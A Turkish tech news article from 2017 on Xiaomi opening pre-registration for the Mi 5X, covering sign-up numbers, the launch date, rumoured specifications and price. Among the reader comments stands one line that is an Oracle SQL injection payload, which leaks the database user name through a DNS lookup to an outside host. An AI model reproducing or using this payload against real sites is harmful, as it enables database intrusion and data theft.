Xiaomi Mi 5X, Ön Siparişe Açıldı!

Xiaomi'nin yeni telefonu Mi 5X'e büyük talep var. Xiaomi'nin Bu ayın sonuna doğru tanıtacağı yeni telefonu Mi 5X'i ön siparişe açtı. Mi 5X'in siparişlerinde patlamaya yaşandı.
19 Temmuz 2017 10:47
Xiaomi Mi 5X, Ön Siparişe Açıldı!
Dün gelen haberlerle Xiaomi'nin yeni akıllı telefonu Mi 5X'i 26 Temmuz tarihinde düzenleyeceği bir etkinlikle tanıtacağı ve cihazda MIUI 9 yani son sürüm özelleştirilmiş Android ile birlikte satışa sunulacağı kesinleşmişti.
 
Bu haberlerin ardından Çin'de cihazın ön kayıt işlemleri de tabii ki başladı ve Xiaomi'nin resmi sitesinden cihazı satın almak için kayıt yaptıran kişilerin sayısının 100,000'i aştığı belirtildi.
 
Xiaomi Mi 5X'e ilgi şaşırtıcı değil!
 
Xiaomi'nin açıkladığı rakamlara göre ilk saatlerde cihaza 139,359 kişi tarafından ön kayıt yaptırıldı. Bu sayının cihazi ile ilgili olarak hiçbir bilginin resmi olarak açıklanmadan elde edildiğini hatırlatmamız gerekiyor.
 
 
 
 
Şu ana kadar cihazın yalnızca birkaç görseli sızdırılmış durumda ve teknik özellikleri hakkında ise dedikodular dolaşmaya devam ediyor. En güçlü iddialar cihazın 5.5 inç'lik Full HD ekran, Snapdragon 625 işlemci ve 4 GB belleğe sahip olacağı yönünde.
 
Xiaomi Mi 5X'in arka ve ön kamerası ya da dahili hafızası gibi detaylar ise henüz açığa çıkmış değil. Son olarak cihazın fiyatının yaklaşık 255 euro olarak belirlendiğini de belirtelim.
 
 
shiftdelete
865544
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
04 Ağustos 2017, Cuma 19:53
Türkiye'ye ne zaman gelir acaba?
Bu haberler ilginizi çekebilir